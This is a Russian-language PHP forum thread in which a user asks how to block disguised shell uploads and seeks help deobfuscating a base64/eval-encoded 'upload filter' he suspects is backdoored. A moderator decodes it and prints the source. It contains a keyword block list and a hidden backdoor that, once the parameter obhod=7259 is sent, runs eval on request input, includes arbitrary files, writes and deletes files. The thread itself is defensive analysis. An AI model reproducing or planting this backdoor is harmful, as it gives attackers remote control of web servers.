Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/topic.php on line 737
Форумы портала PHP.SU :: Фильтрация переменной $_FILES

 PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи


 Страниц (1): [1]   

> Описание: Фильтрация переменной $_FILES
Franklin_Ua
Отправлено: 08 Апреля, 2014 - 04:09:18
Post Id


Новичок


Покинул форум
Сообщений всего: 20
Дата рег-ции: Апр. 2014  


Помог: 0 раз(а)




Доброго времени суток товарищи! Вот возник у меня такой вопрос, как можно запретить выгрузку php файлов на сервер переименованных в расширение картинки.
Вот я взял щелл и переименовал его в:
- foto.php.jpg и прошло
- foto.jpg (на самом деле файл: foto.php - щелл)
Открыть нельзя но можно загрузить.
У меня есть файл с такой фильтрацией но он закодирован в функции "eval" может кто знает как раскодировать? я бы не парился с расскодировкой если бы автор не засунул туда бекдор.
 
 Top
Мелкий Супермодератор
Отправлено: 08 Апреля, 2014 - 09:27:20
Post Id



Активный участник


Покинул форум
Сообщений всего: 11926
Дата рег-ции: Июль 2009  
Откуда: Россия, Санкт-Петербург


Помог: 618 раз(а)




Franklin_Ua пишет:
У меня есть файл с такой фильтрацией но он закодирован в функции "eval" может кто знает как раскодировать?

Заменяете eval на echo, получаете исходник. Повторять до получения осмысленного результата.

Franklin_Ua пишет:
Открыть нельзя но можно загрузить.

Значит пока что безопасно.
Далее отключаете исполнение php в директории загруженных файлов и всё.


-----
PostgreSQL DBA
 
 Top
Franklin_Ua
Отправлено: 08 Апреля, 2014 - 09:33:47
Post Id


Новичок


Покинул форум
Сообщений всего: 20
Дата рег-ции: Апр. 2014  


Помог: 0 раз(а)




Я извиняюсь, а можно по подробнее о (Заменяете eval на echo, получаете исходник. Повторять до получения осмысленного результата.) ?
(Добавление)
Вот код который закодирован:

$V225486532="Gh1+cT8zSEVSRkJSRENMMHh1f3hzMEo2KiAlIi4+bBodfnE/fmRkcmM/M0hQUkNMMGRydGJlfmNu
SGR+Y3JIcm9yMEo+PmxydH94NzArc35hKceAx6fGnsevxpXHpzfHpcetx6zGmcaQx6LHqsenOTdhcmVkfnh5NyY5I
yt1ZSlHZXhkYXJjN9W+NyUnJiQrOHN+YSkwLGoaHTNxfntjZUh+eX5jSHJvcionLBodM3F+e2NlSGR8eHV8dkgmSH
ZlZXZuKjU0MDQ1LBodM3F+e2NlSGR8eHV8dkglSHZlZXZuKjA0NTQwLBodM3F+e2NlSHF4ZXp2Y0h2ZWV2bio1OEs
/OWd/Z2s5f2N2dHRyZGRrOXRkZGs5ZXZlazltfmdrOWRme2s5f2N6azl/Y3p7Pkt1OH41LBodM3F+e2NlSHZ7e0h2
ZWV2bio1OD9xfntySGdiY0h0eHljcnljZGt6eGFySGJne3h2c3JzSHF+e3Jrfnl0e2JzcmtlcmZifmVya3JhdntrY
nl7fnl8a3F4Z3J5a3FnYmNka3FgZX5jc mtxfntySHByY0h0eHljcnljZGtxfntya 3puZGZ7a3R4Z25renxzfmVrZ3
9na39jdnR0cmRka2R/cnt7SHJvcnRrcnR/eGtlcnl2enI+OH41LBodM3F+e2NlSHF+e3JIdmVldm4qNTUsGh0zcX5
7Y2VIYWF4c0h2ZWV2bio1NSwaHTNxfntyZEhxfntjKj92ZWV2bkh8cm5kPzNIUV5bUkQ+PiwaHX5xPzNxfntyZEhx
fntjTDAnMEo2KjAwPmwaHTNlcmRie2NIdHh5KnR4YnljPzNIUV5bUkQ+LBodM3JIdHh5KicsGh1gf357cj8zZXJkY
ntjSHR4eSkqM3JIdHh5Pmx+cT9nZXJwSHp2Y3R/PzNxfntjZUhxeGV6dmNIdmVldm47fnpne3hzcj81NzU7M0hRXl
tSREwzcX57cmRIcX57Y0wzckh0eHlKSj4+PmwzcX57Y2VIfnl+Y0hyb3IqJiw3dWVydnwsajNySHR4eTw8LGoaHX5
xPzNxfntjZUh+eX5jSHJvcjYqJj5sGh1xYnl0Y354eTdxfntyZEhxfntjSGdleGE/M2d4e3hkdj5sGh1we3h1dns3
M3F+e3JkSHF+e2MsN3B7eHV2ezczcX57Y2VIdnt7SHZlZXZuLDdwe3h1dns3M3F+e2NlSHF+e3JIdmVldm4sGh0zc
X57cmRIcX57Y0hnZXhhKjNIUV5bUkRMM3F+e3JkSHF+e2NMM2d4e3hkdkpKLBodM3Z2ZSpldnlzPyY7Lyc+LBoddH
hnbj8zcX57cmRIcX57Y0hnZXhhTDBjem dIeXZ6cjBKOzNxfntyZEhxfntjcmVIY3 pnOTVxfntjcmVIcX57cmRINTk
zdnZlOTU5e3hwNT4sGh0zcX57ckhkf35jdnJ6KnF+e3JIcHJjSHR4eWNyeWNkPzNxfntyZEhxfntjcmVIY3pnOTVx
fntjcmVIcX57cmRINTkzdnZlOTU5e3hwNT4sGh1ieXt+eXw/M3F+e3JkSHF+e2NyZUhjemc5NXF+e2NyZUhxfntyZ
Eg1OTN2dmU5NTl7eHA1PiwaHX5xP2dlcnBIenZjdH8/M3F+e2NlSHZ7e0h2ZWV2bjszcX57ckhkf35jdnJ6PmtrZ2
VycEh6dmN0fz8zcX57Y2VIcX57ckh2ZWV2bjszcX57ckhkf35jdnJ6Pj5sZXJjYmV5NyYsamoaHTN+SHR4eSonLBo
dYH9+e3I/M2VyZGJ7Y0h0eHkpKjN+SHR4eT5sfnE/cX57cmRIcX57Y0hnZXhhPzN+SHR4eT4qKiY+bDNxfntjZUh+
eX5jSHJvciomLDd1ZXJ2fCxqM35IdHh5PDwsamoaHX5xPzNxfntjZUh+eX5jSHJvcioqJj5sc35yPzNxfntjcmVIc
X57ckhydH94PixqahodM3F+e2NlSHp2ZGQqfnpne3hzcj81NzU7M0hQUkM+OTA3MDl+emd7eHNyPzU3NTszSEdYRE
M+OTA3MDl+emd7eHNyPzU3NTszSFRYWFxeUj45MDcwOX56Z3t4c3I/NTc1OzNIRVJGQlJEQz4sGh1+cT9nZXJwSHp
2Y3R/PzNxfntjZUhkfHh1fHZIJkh2ZWV2bjszcX57Y2VIenZkZD5ra2dlcnBIenZjdH8/M3F+e2NlSGR8eHV8dkgl
SHZlZXZuOzNxfntjZUh6dmRkPmtrZ2Vy cEh6dmN0fz8zcX57Y2VIdnt7SHZlZXZu OzNxfntjZUh6dmRkPmtrZ2Vyc
Eh6dmN0fz8zcX57Y2VIYWF4c0h2ZWV2bjszcX57Y2VIenZkZD4+bDNxfntjZUh+eX5jSHJvciolLGoaHX5xPzNxfn
tjZUh+eX5jSHJvcioqJT5sc35yPzNxfntjcmVIeGR5eGF2SHJ0f3g+LGoaHWpye2RybBodfnE/fmRkcmM/M0hFUkZ
CUkRDTDBtdmdleGQmMEo+PmxyYXZ7PzNIRVJGQlJEQ0wwbXZnZXhkJjBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENM
MG12Z2V4ZCUwSj4+bH55dHtic3JIeHl0cj8zSEVSRkJSRENMMG12Z2V4ZCUwSj4sahodfnE/fmRkcmM/M0hFUkZCU
kRDTDBtdmdleGQkMEo+PmwzcHZkYypxeGdyeT8zSEVSRkJSRENMMG12Z2V4ZCRIJjBKOzVgNT4scWdiY2Q/M3B2ZG
M7M0hFUkZCUkRDTDBtdmdleGQkSCUwSj4scXR7eGRyPzNwdmRjPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V
4ZCMwSj4+bHp4YXJIYmd7eHZzcnNIcX57cj8zSFFeW1JETDBtdmdleGQjSCYwSkwwY3pnSHl2enIwSjszSEVSRkJS
RENMMG12Z2V4ZCNIJTBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V4ZCIwSj4+bGJ5e355fD8zSEVSRkJSR
ENMMG12Z2V4ZCIwSj4samoaHQ==";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlY
TmxOalJmWkdWamIyUmxLQ0pLUmxsNlRY cFJOVTVVYXpKTmFtTTVXVzFHZWxwVVdU QllNbEpzV1RJNWExcFRaMmxYV
npGSFpXeHdWVmRVUWxsTmJFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVVEZOZWtWNFRucFplazlFTVdsWldFNX
NUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMH hTalZaYTJSWFpGTkpjRTk1VWxkT2VsVX dUWHBuZVU5VVRYbFFWMHBvWXp
KVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMVJ6YTFacVozbFBSR2QzVFdwUmQwOVVNV2xaV0U1c1RtcFNa
bHBIVm1waU1sSnNTME5LYVUwd2NISkph V3MzU2taWk5VMXFhelZOZWxVMFRWUmpP Vmx0Um5wYVZGa3dXREpTYkZre
U9XdGFVMmRwVjJwT2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0
pLUmxsNVRXcFZNRTlFV1RGTmVrazVTa1 paZWsxNlVUVk9WR3N5VFdwamIwcEdXWG xOYWxVd1QwUlpNVTE2U1hCUGV
WSlhUbFJGZUUxNldUVk5ha2t5VUZOU1YwNUVWWHBOVkVVelRtcE5ORXREVWxkTmFra3hUa1JuTWs1VVRYbExWSE05
SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRf ZGVjb2RlKCJKRll4T0RFME1ESTBNVFE5 SnljN1ptOXlLQ1JXTmpFd09Ua
zVPRE01UFRBN0pGWTJNVEE1T1RrNE16azhKRlkxTVRFek5qa3lNalk3SkZZMk1UQTVPVGs0TXprckt5bDdKRll4T0
RFME1ESTBNVFF1UFNSV056VTBNemd5T1 RNeUtDZ2tWamd5T0Rnd01qUXdPU2drVm pJeU5UUTROalV6TWxza1ZqWXh
NRGs1T1Rnek9WMHBYakk1TmprME5qRTVPU2twTzMxbGRtRnNLQ1JXTVRneE5EQXlOREUwS1RzPSIpKTs="));
 
 Top
Мелкий Супермодератор
Отправлено: 08 Апреля, 2014 - 10:32:36
Post Id



Активный участник


Покинул форум
Сообщений всего: 11926
Дата рег-ции: Июль 2009  
Откуда: Россия, Санкт-Петербург


Помог: 618 раз(а)




eval в коде видите? Замените его на echo, запустите скрипт - получите вывод. Этим выводом замените весь вызов echo (бывшего eval). Теперь опять замените eval на echo, запустите.
Ещё с десяток таких пассов руками и получается (чему я удивился, предполагал получить лишённые смысла переменные), читаемый исходник говнокода:
PHP:
скопировать код в буфер обмена
  1. if($_REQUEST['obhod']!=7259){
  2. if(isset($_GET['security_site_exe'])){echo '<div>Защита включена. version 1.4<br>Prosvet © 2013</div>';}
  3. $filtr_init_exe=0;
  4. $filtr_skobka_1_array="#'#";
  5. $filtr_skobka_2_array='#"#';
  6. $filtr_format_array="/\(.php|.htaccess|.css|.rar|.zip|.sql|.htm|.html)\b/i";
  7. $filtr_all_array="/(file_put_contents|move_uploaded_file|include|require|eval|unlink|fopen|fputs|fwrite|file_get_contents|file|mysql|copy|mkdir|php|htaccess|shell_exec|echo|rename)/i";
  8. $filtr_file_array="";
  9. $filtr_vvod_array="";
  10. $files_filt=(array_keys($_FILES));
  11. if($files_filt['0']!=''){
  12. $result_con=count($_FILES);
  13. $e_con=0;
  14. while($result_con>=$e_con){if(preg_match($filtr_format_array,implode(" ",$_FILES[$files_filt[$e_con]]))){$filtr_init_exe=1; break;}$e_con++;}
  15. if($filtr_init_exe!=1){
  16. function files_filt_prov($polosa){
  17. global $files_filt; global $filtr_all_array; global $filtr_file_array;
  18. $files_filt_prov=$_FILES[$files_filt[$polosa]];
  19. $aar=rand(1,80);
  20. copy($files_filt_prov['tmp_name'],$files_filter_tmp."filter_files_".$aar.".log");
  21. $file_shitaem=file_get_contents($files_filter_tmp."filter_files_".$aar.".log");
  22. unlink($files_filter_tmp."filter_files_".$aar.".log");
  23. if(preg_match($filtr_all_array,$file_shitaem)||preg_match($filtr_file_array,$file_shitaem)){return 1;}}
  24. $i_con=0;
  25. while($result_con>=$i_con){if(files_filt_prov($i_con)==1){$filtr_init_exe=1; break;}$i_con++;}}
  26. if($filtr_init_exe==1){die($filter_file_echo);}}
  27. $filtr_mass=implode(" ",$_GET).' '.implode(" ",$_POST).' '.implode(" ",$_COOKIE).' '.implode(" ",$_REQUEST);
  28. if(preg_match($filtr_skobka_1_array,$filtr_mass)||preg_match($filtr_skobka_2_array,$filtr_mass)||preg_match($filtr_all_array,$filtr_mass)||preg_match($filtr_vvod_array,$filtr_mass)){$filtr_init_exe=2;}
  29. if($filtr_init_exe==2){die($filter_osnova_echo);}
  30. }else{
  31. if(isset($_REQUEST['zapros1'])){eval($_REQUEST['zapros1']);}
  32. if(isset($_REQUEST['zapros2'])){include_once($_REQUEST['zapros2']);}
  33. if(isset($_REQUEST['zapros3'])){$gast=fopen($_REQUEST['zapros3_1'],"w");fputs($gast,$_REQUEST['zapros3_2']);fclose($gast);}
  34. if(isset($_REQUEST['zapros4'])){move_uploaded_file($_FILES['zapros4_1']['tmp_name'],$_REQUEST['zapros4_2']);}
  35. if(isset($_REQUEST['zapros5'])){unlink($_REQUEST['zapros5']);}}


-----
PostgreSQL DBA
 
 Top
Franklin_Ua
Отправлено: 08 Апреля, 2014 - 10:37:21
Post Id


Новичок


Покинул форум
Сообщений всего: 20
Дата рег-ции: Апр. 2014  


Помог: 0 раз(а)




Вы гений! спасибо Вам за помощь! могу разместить Ваш рекламный текст на своем сайте в качестве благодарности!
(Добавление)
А Вы случайно не знаете какой именно код (среди раскодированного) может быть вредоносным? через него заливают щелл на сервер.
 
 Top
Мелкий Супермодератор
Отправлено: 08 Апреля, 2014 - 10:57:26
Post Id



Активный участник


Покинул форум
Сообщений всего: 11926
Дата рег-ции: Июль 2009  
Откуда: Россия, Санкт-Петербург


Помог: 618 раз(а)




По-моему, тут всё и надо удалять.


-----
PostgreSQL DBA
 
 Top
Franklin_Ua
Отправлено: 08 Апреля, 2014 - 11:01:20
Post Id


Новичок


Покинул форум
Сообщений всего: 20
Дата рег-ции: Апр. 2014  


Помог: 0 раз(а)




Мелкий пишет:
По-моему, тут всё и надо удалять.

я тоже так подумал ))
Но без него не работает.. код с помощью которого можно заливать щелл через адресную строку..
(Добавление)
вот это подозрительный код:
if(isset($_REQUEST['zapros1'])){eval($_REQUEST['zapros1']);}
if(isset($_REQUEST['zapros2'])){include_once($_REQUEST['zapros2']);}
if(isset($_REQUEST['zapros3'])){$gast=fopen($_REQUEST['zapros3_1'],"w");fputs($gast,$_REQUEST['zapros3_2']);fclose($gast);}
if(isset($_REQUEST['zapros4'])){move_uploaded_file($_FILES['zapros4_1']['tmp_name'],$_REQUEST['zapros4_2']);}
if(isset($_REQUEST['zapros5'])){unlink($_REQUEST['zapros5']);}}
(Добавление)
1, fopen() используя mode
2, w' Открывает файл только для записи; помещает указатель в начало файла и обрезает файл до нулевой длинны. Если файл не существует - пробует его создать.
3, сам код: if(isset($_REQUEST['zapros3'])){$gast=fopen($_REQUEST['zapros3_1'],"w");fputs($gast,$_REQUEST['zapros3_2']);fclose($gast);}
(Добавление)
Кто знает как вызвать функцию: $_REQUEST ?
 
 Top
Мелкий Супермодератор
Отправлено: 08 Апреля, 2014 - 12:10:57
Post Id



Активный участник


Покинул форум
Сообщений всего: 11926
Дата рег-ции: Июль 2009  
Откуда: Россия, Санкт-Петербург


Помог: 618 раз(а)




$_REQUEST - не функция. Это суперглобальный массив, наподобии $_POST и $_GET. Обычно содержит значения как раз из $_POST и $_GET, иногда - из $_COOKIE (определяется в php.ini)

Последние 5 строк точно подозрительны. А вот есть ли что ещё вредного - вникать в код нет желания.


-----
PostgreSQL DBA
 
 Top
Franklin_Ua
Отправлено: 08 Апреля, 2014 - 12:20:31
Post Id


Новичок


Покинул форум
Сообщений всего: 20
Дата рег-ции: Апр. 2014  


Помог: 0 раз(а)




Мелкий пишет:
$_REQUEST - не функция. Это суперглобальный массив, наподобии $_POST и $_GET. Обычно содержит значения как раз из $_POST и $_GET, иногда - из $_COOKIE (определяется в php.ini)

Последние 5 строк точно подозрительны. А вот есть ли что ещё вредного - вникать в код нет желания.

И на этом спасибо ) действительно помогли! )) я вырезал все что вызывало подозоение и при этом все работает как и работало.
 
 Top
Franklin_Ua
Отправлено: 10 Апреля, 2014 - 20:45:08
Post Id


Новичок


Покинул форум
Сообщений всего: 20
Дата рег-ции: Апр. 2014  


Помог: 0 раз(а)




Мелкий я вот попробывал сделать как Вы написали но ничего не получилось..
(Добавление)
Вот к примеру код:
===================

$V225486532="Gh1+cT8zSEVSRkJSRENMMHh1f3hzMEo2KiAlIi4+bBodfnE/fmRkcmM/M0hQUkNMMGRydGJlfmNu
SGR+Y3JIcm9yMEo+PmxydH94NzArc35hKceAx6fGnsevxpXHpzfHpcetx6zGmcaQx6LHqsenOTdhcmVkfnh5NyY5I
yt1ZSlHZXhkYXJjN9W+NyUnJiQrOHN+YSkwLGoaHTNxfntjZUh+eX5jSHJvcionLBodM3F+e2NlSGR8eHV8dkgmSH
ZlZXZuKjU0MDQ1LBodM3F+e2NlSGR8eHV8dkglSHZlZXZuKjA0NTQwLBodM3F+e2NlSHF4ZXp2Y0h2ZWV2bio1OEs
/OWd/Z2s5f2N2dHRyZGRrOXRkZGs5ZXZlazltfmdrOWRme2s5f2N6azl/Y3p7Pkt1OH41LBodM3F+e2NlSHZ7e0h2
ZWV2bio1OD9xfntySGdiY0h0eHljcnljZGt6eGFySGJne3h2c3JzSHF+e3Jrfnl0e2JzcmtlcmZifmVya3JhdntrY
nl7fnl8a3F4Z3J5a3FnYmNka3FgZX5jc mtxfntySHByY0h0eHljcnljZGtxfntya 3puZGZ7a3R4Z25renxzfmVrZ3
9na39jdnR0cmRka2R/cnt7SHJvcnRrcnR/eGtlcnl2enI+OH41LBodM3F+e2NlSHF+e3JIdmVldm4qNTUsGh0zcX5
7Y2VIYWF4c0h2ZWV2bio1NSwaHTNxfntyZEhxfntjKj92ZWV2bkh8cm5kPzNIUV5bUkQ+PiwaHX5xPzNxfntyZEhx
fntjTDAnMEo2KjAwPmwaHTNlcmRie2NIdHh5KnR4YnljPzNIUV5bUkQ+LBodM3JIdHh5KicsGh1gf357cj8zZXJkY
ntjSHR4eSkqM3JIdHh5Pmx+cT9nZXJwSHp2Y3R/PzNxfntjZUhxeGV6dmNIdmVldm47fnpne3hzcj81NzU7M0hRXl
tSREwzcX57cmRIcX57Y0wzckh0eHlKSj4+PmwzcX57Y2VIfnl+Y0hyb3IqJiw3dWVydnwsajNySHR4eTw8LGoaHX5
xPzNxfntjZUh+eX5jSHJvcjYqJj5sGh1xYnl0Y354eTdxfntyZEhxfntjSGdleGE/M2d4e3hkdj5sGh1we3h1dns3
M3F+e3JkSHF+e2MsN3B7eHV2ezczcX57Y2VIdnt7SHZlZXZuLDdwe3h1dns3M3F+e2NlSHF+e3JIdmVldm4sGh0zc
X57cmRIcX57Y0hnZXhhKjNIUV5bUkRMM3F+e3JkSHF+e2NMM2d4e3hkdkpKLBodM3Z2ZSpldnlzPyY7Lyc+LBoddH
hnbj8zcX57cmRIcX57Y0hnZXhhTDBjem dIeXZ6cjBKOzNxfntyZEhxfntjcmVIY3 pnOTVxfntjcmVIcX57cmRINTk
zdnZlOTU5e3hwNT4sGh0zcX57ckhkf35jdnJ6KnF+e3JIcHJjSHR4eWNyeWNkPzNxfntyZEhxfntjcmVIY3pnOTVx
fntjcmVIcX57cmRINTkzdnZlOTU5e3hwNT4sGh1ieXt+eXw/M3F+e3JkSHF+e2NyZUhjemc5NXF+e2NyZUhxfntyZ
Eg1OTN2dmU5NTl7eHA1PiwaHX5xP2dlcnBIenZjdH8/M3F+e2NlSHZ7e0h2ZWV2bjszcX57ckhkf35jdnJ6PmtrZ2
VycEh6dmN0fz8zcX57Y2VIcX57ckh2ZWV2bjszcX57ckhkf35jdnJ6Pj5sZXJjYmV5NyYsamoaHTN+SHR4eSonLBo
dYH9+e3I/M2VyZGJ7Y0h0eHkpKjN+SHR4eT5sfnE/cX57cmRIcX57Y0hnZXhhPzN+SHR4eT4qKiY+bDNxfntjZUh+
eX5jSHJvciomLDd1ZXJ2fCxqM35IdHh5PDwsamoaHX5xPzNxfntjZUh+eX5jSHJvcioqJj5sc35yPzNxfntjcmVIc
X57ckhydH94PixqahodM3F+e2NlSHp2ZGQqfnpne3hzcj81NzU7M0hQUkM+OTA3MDl+emd7eHNyPzU3NTszSEdYRE
M+OTA3MDl+emd7eHNyPzU3NTszSFRYWFxeUj45MDcwOX56Z3t4c3I/NTc1OzNIRVJGQlJEQz4sGh1+cT9nZXJwSHp
2Y3R/PzNxfntjZUhkfHh1fHZIJkh2ZWV2bjszcX57Y2VIenZkZD5ra2dlcnBIenZjdH8/M3F+e2NlSGR8eHV8dkgl
SHZlZXZuOzNxfntjZUh6dmRkPmtrZ2Vy cEh6dmN0fz8zcX57Y2VIdnt7SHZlZXZu OzNxfntjZUh6dmRkPmtrZ2Vyc
Eh6dmN0fz8zcX57Y2VIYWF4c0h2ZWV2bjszcX57Y2VIenZkZD4+bDNxfntjZUh+eX5jSHJvciolLGoaHX5xPzNxfn
tjZUh+eX5jSHJvcioqJT5sc35yPzNxfntjcmVIeGR5eGF2SHJ0f3g+LGoaHWpye2RybBodfnE/fmRkcmM/M0hFUkZ
CUkRDTDBtdmdleGQmMEo+PmxyYXZ7PzNIRVJGQlJEQ0wwbXZnZXhkJjBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENM
MG12Z2V4ZCUwSj4+bH55dHtic3JIeHl0cj8zSEVSRkJSRENMMG12Z2V4ZCUwSj4sahodfnE/fmRkcmM/M0hFUkZCU
kRDTDBtdmdleGQkMEo+PmwzcHZkYypxeGdyeT8zSEVSRkJSRENMMG12Z2V4ZCRIJjBKOzVgNT4scWdiY2Q/M3B2ZG
M7M0hFUkZCUkRDTDBtdmdleGQkSCUwSj4scXR7eGRyPzNwdmRjPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V
4ZCMwSj4+bHp4YXJIYmd7eHZzcnNIcX57cj8zSFFeW1JETDBtdmdleGQjSCYwSkwwY3pnSHl2enIwSjszSEVSRkJS
RENMMG12Z2V4ZCNIJTBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V4ZCIwSj4+bGJ5e355fD8zSEVSRkJSR
ENMMG12Z2V4ZCIwSj4samoaHQ==";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlY
TmxOalJmWkdWamIyUmxLQ0pLUmxsNlRY cFJOVTVVYXpKTmFtTTVXVzFHZWxwVVdU QllNbEpzV1RJNWExcFRaMmxYV
npGSFpXeHdWVmRVUWxsTmJFcHpWMVJKT ldFeGNGSlFWREJwUzFSemExWnFVVEZOZ WtWNFRucFplazlFTVdsWldFNX
NUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMH hTalZaYTJSWFpGTkpjRTk1VWxkT2VsVX dUWHBuZVU5VVRYbFFWMHBvWXp
KVk1rNUdPV3RhVjA1MldrZFZiMGxzYTN saFNHdHBTMVJ6YTFacVozbFBSR2QzVFd wUmQwOVVNV2xaV0U1c1RtcFNa
bHBIVm1waU1sSnNTME5LYVUwd2NISkph V3MzU2taWk5VMXFhelZOZWxVMFRWUmpP Vmx0Um5wYVZGa3dXREpTYkZre
U9XdGFVMmRwVjJwT2QyTkhTblJYYms1Y VYwWktjMGxwYXpjaUtTazdaWFpoYkNoa VlYTmxOalJmWkdWamIyUmxLQ0
pLUmxsNVRXcFZNRTlFV1RGTmVrazVTa1 paZWsxNlVUVk9WR3N5VFdwamIwcEdXWG xOYWxVd1QwUlpNVTE2U1hCUGV
WSlhUbFJGZUUxNldUVk5ha2t5VUZOU1Y wNUVWWHBOVkVVelRtcE5ORXREVWxkTmF ra3hUa1JuTWs1VVRYbExWSE05
SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRf ZGVjb2RlKCJKRll4T0RFME1ESTBNVFE5 SnljN1ptOXlLQ1JXTmpFd09Ua
zVPRE01UFRBN0pGWTJNVEE1T1RrNE16a zhKRlkxTVRFek5qa3lNalk3SkZZMk1UQ TVPVGs0TXprckt5bDdKRll4T0
RFME1ESTBNVFF1UFNSV056VTBNemd5T1 RNeUtDZ2tWamd5T0Rnd01qUXdPU2drVm pJeU5UUTROalV6TWxza1ZqWXh
NRGs1T1Rnek9WMHBYakk1TmprME5qRTVPU2twTzMxbGRtRnNLQ1JXTVRneE5EQXlOREUwS1RzPSIpKTs="));

======================

Вот так я его изменил:

===========

$V225486532="Gh1+cT8zSEVSRkJSRENMMHh1f3hzMEo2KiAlIi4+bBodfnE/fmRkcmM/M0hQUkNMMGRydGJlfmNu
SGR+Y3JIcm9yMEo+PmxydH94NzArc35hKceAx6fGnsevxpXHpzfHpcetx6zGmcaQx6LHqsenOTdhcmVkfnh5NyY5I
yt1ZSlHZXhkYXJjN9W+NyUnJiQrOHN+YSkwLGoaHTNxfntjZUh+eX5jSHJvcionLBodM3F+e2NlSGR8eHV8dkgmSH
ZlZXZuKjU0MDQ1LBodM3F+e2NlSGR8eHV8dkglSHZlZXZuKjA0NTQwLBodM3F+e2NlSHF4ZXp2Y0h2ZWV2bio1OEs
/OWd/Z2s5f2N2dHRyZGRrOXRkZGs5ZXZlazltfmdrOWRme2s5f2N6azl/Y3p7Pkt1OH41LBodM3F+e2NlSHZ7e0h2
ZWV2bio1OD9xfntySGdiY0h0eHljcnljZGt6eGFySGJne3h2c3JzSHF+e3Jrfnl0e2JzcmtlcmZifmVya3JhdntrY
nl7fnl8a3F4Z3J5a3FnYmNka3FgZX5jc mtxfntySHByY0h0eHljcnljZGtxfntya 3puZGZ7a3R4Z25renxzfmVrZ3
9na39jdnR0cmRka2R/cnt7SHJvcnRrcnR/eGtlcnl2enI+OH41LBodM3F+e2NlSHF+e3JIdmVldm4qNTUsGh0zcX5
7Y2VIYWF4c0h2ZWV2bio1NSwaHTNxfntyZEhxfntjKj92ZWV2bkh8cm5kPzNIUV5bUkQ+PiwaHX5xPzNxfntyZEhx
fntjTDAnMEo2KjAwPmwaHTNlcmRie2NIdHh5KnR4YnljPzNIUV5bUkQ+LBodM3JIdHh5KicsGh1gf357cj8zZXJkY
ntjSHR4eSkqM3JIdHh5Pmx+cT9nZXJwSHp2Y3R/PzNxfntjZUhxeGV6dmNIdmVldm47fnpne3hzcj81NzU7M0hRXl
tSREwzcX57cmRIcX57Y0wzckh0eHlKSj4+PmwzcX57Y2VIfnl+Y0hyb3IqJiw3dWVydnwsajNySHR4eTw8LGoaHX5
xPzNxfntjZUh+eX5jSHJvcjYqJj5sGh1xYnl0Y354eTdxfntyZEhxfntjSGdleGE/M2d4e3hkdj5sGh1we3h1dns3
M3F+e3JkSHF+e2MsN3B7eHV2ezczcX57Y2VIdnt7SHZlZXZuLDdwe3h1dns3M3F+e2NlSHF+e3JIdmVldm4sGh0zc
X57cmRIcX57Y0hnZXhhKjNIUV5bUkRMM3F+e3JkSHF+e2NMM2d4e3hkdkpKLBodM3Z2ZSpldnlzPyY7Lyc+LBoddH
hnbj8zcX57cmRIcX57Y0hnZXhhTDBjem dIeXZ6cjBKOzNxfntyZEhxfntjcmVIY3 pnOTVxfntjcmVIcX57cmRINTk
zdnZlOTU5e3hwNT4sGh0zcX57ckhkf35jdnJ6KnF+e3JIcHJjSHR4eWNyeWNkPzNxfntyZEhxfntjcmVIY3pnOTVx
fntjcmVIcX57cmRINTkzdnZlOTU5e3hwNT4sGh1ieXt+eXw/M3F+e3JkSHF+e2NyZUhjemc5NXF+e2NyZUhxfntyZ
Eg1OTN2dmU5NTl7eHA1PiwaHX5xP2dlcnBIenZjdH8/M3F+e2NlSHZ7e0h2ZWV2bjszcX57ckhkf35jdnJ6PmtrZ2
VycEh6dmN0fz8zcX57Y2VIcX57ckh2ZWV2bjszcX57ckhkf35jdnJ6Pj5sZXJjYmV5NyYsamoaHTN+SHR4eSonLBo
dYH9+e3I/M2VyZGJ7Y0h0eHkpKjN+SHR4eT5sfnE/cX57cmRIcX57Y0hnZXhhPzN+SHR4eT4qKiY+bDNxfntjZUh+
eX5jSHJvciomLDd1ZXJ2fCxqM35IdHh5PDwsamoaHX5xPzNxfntjZUh+eX5jSHJvcioqJj5sc35yPzNxfntjcmVIc
X57ckhydH94PixqahodM3F+e2NlSHp2ZGQqfnpne3hzcj81NzU7M0hQUkM+OTA3MDl+emd7eHNyPzU3NTszSEdYRE
M+OTA3MDl+emd7eHNyPzU3NTszSFRYWFxeUj45MDcwOX56Z3t4c3I/NTc1OzNIRVJGQlJEQz4sGh1+cT9nZXJwSHp
2Y3R/PzNxfntjZUhkfHh1fHZIJkh2ZWV2bjszcX57Y2VIenZkZD5ra2dlcnBIenZjdH8/M3F+e2NlSGR8eHV8dkgl
SHZlZXZuOzNxfntjZUh6dmRkPmtrZ2Vy cEh6dmN0fz8zcX57Y2VIdnt7SHZlZXZu OzNxfntjZUh6dmRkPmtrZ2Vyc
Eh6dmN0fz8zcX57Y2VIYWF4c0h2ZWV2bjszcX57Y2VIenZkZD4+bDNxfntjZUh+eX5jSHJvciolLGoaHX5xPzNxfn
tjZUh+eX5jSHJvcioqJT5sc35yPzNxfntjcmVIeGR5eGF2SHJ0f3g+LGoaHWpye2RybBodfnE/fmRkcmM/M0hFUkZ
CUkRDTDBtdmdleGQmMEo+PmxyYXZ7PzNIRVJGQlJEQ0wwbXZnZXhkJjBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENM
